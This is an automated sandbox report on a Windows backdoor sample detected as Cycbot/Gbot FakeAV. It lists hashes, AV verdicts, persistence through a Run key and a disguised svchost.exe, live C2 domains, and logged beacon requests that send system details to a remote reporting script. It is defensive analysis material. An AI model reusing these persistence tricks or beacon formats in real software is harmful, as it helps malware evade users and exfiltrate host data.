Analysis Date: 2014-11-22 23:31:20
MD5: 11368e0f685dd8a19fcc97d417fc324e
SHA1: 0a3e3c0a35d64e8a19fe61a10dc404e0492d35ba

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section: .text md5: c6366f0a1993b91fa362f9ec1bd93de4 sha1: 9099fda7323bc9c3dac26a5ae00210fd247e4c03 size: 56320
Section: .rdata md5: 9c4b339a9e0230401cffbef34a0af759 sha1: 74fdd828682b13c417c189828bd9a75382e551c9 size: 4096
Section: .data md5: 7af08d279a14e4d9361a1b88cab3f256 sha1: 5e64a1309c9cbe55cf4f1d13c67b3a907af335ae size: 38400
Section: .rsrc md5: 5e828602a6d9775e437405b0afc50c46 sha1: 14f582eb78056e73d6c1f5caaaf9388ae29b2b31 size: 1024
Timestamp: 2005-10-15 17:27:01
Version: PrivateBuild: 1036
FileDescription: Windows Host Process
PEhash: d9c54bb43acfcacea1c8314ad8f9706d0fdad34c
IMPhash: 21c14cbd4ec276700c46f24a2be304a2
AV: 360 Safe - Gen:Variant.Kazy.2225
AV: Ad-Aware - Gen:Variant.Kazy.2225
AV: Alwil (avast) - MalOb-IJ [Cryp]
AV: Arcabit (arcavir) - no_virus
AV: Authentium - W32/Goolbot.B.gen!Eldorado
AV: Avira (antivir) - TR/Crypt.XPACK.Gen
AV: BullGuard - Gen:Variant.Kazy.2225
AV: CA (E-Trust Ino) - Win32/FakeAV.S!generic
AV: CAT (quickheal) - Backdoor.Cycbot.B
AV: ClamAV - Trojan.Agent-215566
AV: Dr. Web - Trojan.DownLoader1.34990
AV: Emsisoft - Gen:Variant.Kazy.2225
AV: Eset (nod32) - Win32/Kryptik.IAV
AV: Fortinet - W32/FakeAV.BZD!tr
AV: Frisk (f-prot) - W32/Goolbot.B.gen!Eldorado
AV: F-Secure - Gen:Variant.Kazy.2225
AV: Grisoft (avg) - Cryptic.BFI
AV: Ikarus - Trojan.Win32.FakeAV
AV: K7 - Trojan-Downloader ( 001c55311 )
AV: Kaspersky - Packed.Win32.Krap.hy
AV: MalwareBytes - Backdoor.Gbot
AV: Mcafee - BackDoor-EXI
AV: Microsoft Security Essentials - Backdoor:Win32/Cycbot.G
AV: MicroWorld (escan) - Gen:Variant.Kazy.2225
AV: Rising - no_virus
AV: Sophos - Troj/FakeAv-BWP
AV: Symantec - Trojan.FakeAV!gen39
AV: Trend Micro - BKDR_CYCBOT.SME
AV: VirusBlokAda (vba32) - no_virus

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ 1
Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\svchost ➝ C:\Documents and Settings\Administrator\Application Data\Microsoft\svchost.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\svchost.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\stor.cfg
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\shell.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft\Windows
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates Mutex: {A5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: {61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex: {7791C364-DE4E-4000-9E92-9CCAFDDD90DC}
Creates Mutex: {C66E79CE-8935-4ed9-A6B1-4983619CB925}
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: {B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS: www.google.com
Winsock DNS: www.pcdocpro.com
Winsock DNS: blogsmonitoringservice.com
Winsock DNS: 127.0.0.1
Winsock DNS: findeffectivecasino.com
Winsock DNS: bigtelevideochanel.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\shell.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft\Windows

Creates Process: C:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\shell.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe

Network Details:

DNS: pcdocpro.com
Type: A
209.59.161.20
DNS: www.google.com
Type: A
173.194.125.51
DNS: www.google.com
Type: A
173.194.125.52
DNS: www.google.com
Type: A
173.194.125.48
DNS: www.google.com
Type: A
173.194.125.49
DNS: www.google.com
Type: A
173.194.125.50
DNS: protectyourpc-11.com
Type: A
74.200.250.181
DNS: www.pcdocpro.com
Type: A
DNS: bigtelevideochanel.com
Type: A
DNS: findeffectivecasino.com
Type: A
DNS: blogsmonitoringservice.com
Type: A
HTTP GET: http://www.pcdocpro.com/images/logo-3.jpg?tq=gP4aKydMn3SNnjFQM1TbKaCr%2BPy0e%2Ftjwr%2Fm7PIu8DP0ZfZ6bi7TXVsltreu1sPF3Sbia0UhghUDQPS2z10WC1kzg%2BmVFxp96CbuMiCs7bJEy7XM80ns0DTd9Qxx0VjUjDqR4h7Y13V%2BoqRFeo7eUGgsuooLrimRZcuTF7nr2%2Bh5blooBZZzJI0naQzqTea8DXQ9d2tvm3U%2Bx1D9NPoz9P2WoO5WSSneL63Wnc2stsXUUgKNrRRmXlPCCriYSGz9YOMmKzpp0jRDqunfBo8V%2FQnyPuY35CpkSa22wEvuhlrUdp%2F84dQIcYlu3hA7xNvYhoeMAWvDe6NOTX9q521FYHy%2BiKFthwtjt%2BrzizSxRqe52CGzr7VWaj1r4zNUx0NMelGw%2BhA%2Fk9GetwFe12VCL2X8hiA4Ie0bclXN8pg1%2B6vDgpg0BtgRRG%2F6Gg
User-Agent: gbot/2.3
HTTP GET: http://www.google.com/
User-Agent:
HTTP GET: http://www.google.com/
User-Agent:
HTTP POST: http://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v43&system=6.0.2900|5.1.2600|1033&id=C059900AFF044FFC75DE&status=main&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POST: http://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v43&system=6.0.2900|5.1.2600|1033&id=C059900AFF044FFC75DE&status=err088_2_0&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POST: http://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v43&system=6.0.2900|5.1.2600|1033&id=C059900AFF044FFC75DE&status=err073_2_2&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POST: http://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v43&system=6.0.2900|5.1.2600|1033&id=C059900AFF044FFC75DE&status=err084&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POST: http://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v43&system=6.0.2900|5.1.2600|1033&id=C059900AFF044FFC75DE&status=err095_2_4&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Flows TCP: 192.168.1.1:1031 ➝ 209.59.161.20:80
Flows TCP: 192.168.1.1:1032 ➝ 173.194.125.51:80
Flows TCP: 192.168.1.1:1033 ➝ 173.194.125.51:80
Flows TCP: 192.168.1.1:1034 ➝ 74.200.250.181:80
Flows TCP: 192.168.1.1:1035 ➝ 74.200.250.181:80
Flows TCP: 192.168.1.1:1036 ➝ 74.200.250.181:80
Flows TCP: 192.168.1.1:1037 ➝ 74.200.250.181:80
Flows TCP: 192.168.1.1:1038 ➝ 74.200.250.181:80

Raw Pcap

Strings